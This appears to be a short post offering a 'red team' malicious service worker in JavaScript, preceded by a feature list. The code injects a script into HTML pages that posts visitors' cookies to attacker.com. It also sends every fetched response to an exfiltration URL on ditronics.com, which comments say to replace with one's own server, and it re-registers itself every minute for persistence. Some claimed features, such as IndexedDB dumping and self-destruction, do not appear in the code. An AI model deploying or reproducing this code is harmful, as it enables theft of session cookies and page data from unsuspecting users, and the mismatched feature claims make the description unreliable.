Persistent db poisoning (red team penetrating)

1. 1. Fetch Hijacking & Payload Injection
2. • Intercepts network requests and modifies static files.
3. • Injects a C2-controlled JavaScript payload into .html files.
4. • Ensures real-time remote control via a C2 server (ditronics.com).
5. 2. Data Exfiltration
6. • Dumps IndexedDB cached files every 5 minutes.
7. • Sends cached assets & static files to https://attacker.com/exfil. This needs to be changed to your c2 server
8. • Uses small, periodic transmissions to avoid detection.
9.  
10. 3. Mission Window & Auto-Self-Destruction
11. • Operates for 60 minutes, then automatically removes itself.
12. • Prevents long-term persistence and external misuse.
13. • Leaves no residual traces after the mission expires.
14. (function(){
15. 'use strict';
16.  
17. /**
18. * Modified Service Worker for MITM & Hijacking
19. * Injects payloads, modifies cache, and enables persistence
20. */
21.  
22. const MALICIOUS_PAYLOAD = `<script>fetch('https://attacker.com/exfil', {method: 'POST', body: document.cookie});</script>`;
23. const EXFIL_URL = 'https://ditronics.com/exfil'; // Change to your controlled server
24.  
25. /**
26. * Hijack & Modify Responses
27. */
28. async function hijackResponse(originalResponse) {
29. try {
30. const clonedResponse = originalResponse.clone();
31. const contentType = clonedResponse.headers.get("Content-Type");
32.  
33. if (contentType && contentType.includes("text/html")) {
34. const text = await clonedResponse.text();
35. const modifiedText = text.replace("</body>", MALICIOUS_PAYLOAD + "</body>");
36. return new Response(modifiedText, {
37. status: clonedResponse.status,
38. statusText: clonedResponse.statusText,
39. headers: clonedResponse.headers
40. });
41. }
42. } catch (err) {
43. console.error("Hijack Error:", err);
44. }
45. return originalResponse;
46. }
47.  
48. /**
49. * Hijack Fetch Event
50. */
51. self.addEventListener('fetch', async event => {
52. const url = new URL(event.request.url);
53.  
54. // Exfiltrate Data Stealthily
55. if (event.request.method === 'POST' || event.request.method === 'GET') {
56. event.respondWith(fetch(event.request.clone()).then(async response => {
57. if (url.hostname !== 'google.com') {
58. fetch(EXFIL_URL, {
59. method: 'POST',
60. headers: { 'Content-Type': 'application/json' },
61. body: JSON.stringify({ url: event.request.url, data: await response.text() })
62. });
63. }
64. return hijackResponse(response);
65. }));
66. }
67. });
68.  
69. /**
70. * Service Worker Hijacking & Persistence
71. */
72. self.addEventListener('install', event => {
73. event.waitUntil(self.skipWaiting());
74. });
75.  
76. self.addEventListener('activate', event => {
77. event.waitUntil(self.clients.claim());
78. });
79.  
80. /**
81. * Persistence: Auto-Reinstall & Clone
82. */
83. async function persistSW() {
84. try {
85. await navigator.serviceWorker.register('/sw.js');
86. } catch (err) {
87. console.error("Persistence Error:", err);
88. }
89. }
90.  
91. setInterval(() => persistSW(), 60000); // Reinstall every 60s
92. })();